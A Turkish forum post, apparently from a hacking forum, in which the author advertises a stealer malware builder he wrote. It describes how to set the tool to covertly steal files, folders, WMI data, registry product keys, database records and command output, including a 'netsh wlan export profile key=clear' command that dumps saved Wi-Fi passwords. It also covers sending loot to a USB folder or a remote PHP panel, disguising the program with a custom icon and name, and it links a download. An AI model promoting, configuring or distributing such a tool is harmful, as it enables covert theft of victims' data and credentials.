- 5 Şub 2022
- 17
- 25
Öncelikle Stealer nedir ve ne işe yarar?
Stealer hedef kişinin bilgisayarına erişim kurulduğunda fark ettirmeden veri çalmak için hazırlanmış yazılımlardır.
Veri burada dosya, klasör, bilgi olabilir.
Kendi hazırladığım bu yazılımı ise her türlü veriyi çalmak üzerine geliştirdim.
Programı 3 ana parçada inceleyelim.
İlk olarak kırmızı işaretli kısım çalınacak verileri seçmek ve belirtmek üzerine alandır. Sağ üst tarafta bulunan comboBox vasıtasıyla çalınacak verinin türünü ve ardından solunda bulunan text kutucuğuna tıklayarak hangi veri olduğunu belirtebiliriz.
Başlıca orada bulunan veri türleri nedir
Dosya: Dosya çalmak için.
Klasör: Klasör çalmak için.
WMI: WMI Verilerini çalmak için.(Üzerinde oynanma olmadıysa bilgisayar hakkında en doğru verileri burası sağlıyor.)
Regedit: Kayıt defterindeki verileri çalmak için(Ürün anahtarları vs burada bulunabiliyor.)
SQLQuery: SQL,Access,SQLite,Mysql veri tabanı yönetim sistemlerinden belirli veya belirtilen veritabanı veya kayıtları çalmak için.
ExeParametre: Bu ise bir yazılıma belirli değerler verip çalıştırıldığında ürettiği sonuçları çalmak için. Mesela Cmd'ye systeminfo yazıldığında üretilen sonuçları yada
netsh wlan export profile key=clear yazılarak kayıt edilmiş wlan profillerini
driverquery yazılarak disk bilgilerini çalmak için.
Hedef tipi yazan yeşil ile belirtilmiş alan ise çalınan bilgilerin nereye aktarılacağını belirtiyor. Buradan dosya seçilir ise virüs bulunduğu (flash bellek bunun için biçilmiş kaftan) lokasyon altında Data klasörü altına aktarılıyor.
Panel ise kendi hazırlamış olduğum panel vasıtasıyla uzak sunucu veya bir web site aracılığıyla verileri aktarmak için.
Turuncu alan ise icon belirtme isim yazdırma ve virüsün çalışma esnasında çalıştırılacak programı belirtiyor.
Çalışacak dosyanın virüsünüz ile aynı klasörde belirtiğiniz isim ile olması şart.
Virüs ile beraberinde System.Data.SQLite.dll System.Data.SQLite.xml MySql.Data.dll MySql.Data.xml dosyalarını taşıyın.
PHP Panel kısmında ayar.php dosyasına gerekli veritabanı ve host adını yazmayı unutmayın.
[-] Panel ile çalışılırken klasör verileri aktarılmamaktadır.
İndirme Linki : THTStealer.rar dosyasını indir - download
VirüsTotal : VirusTotal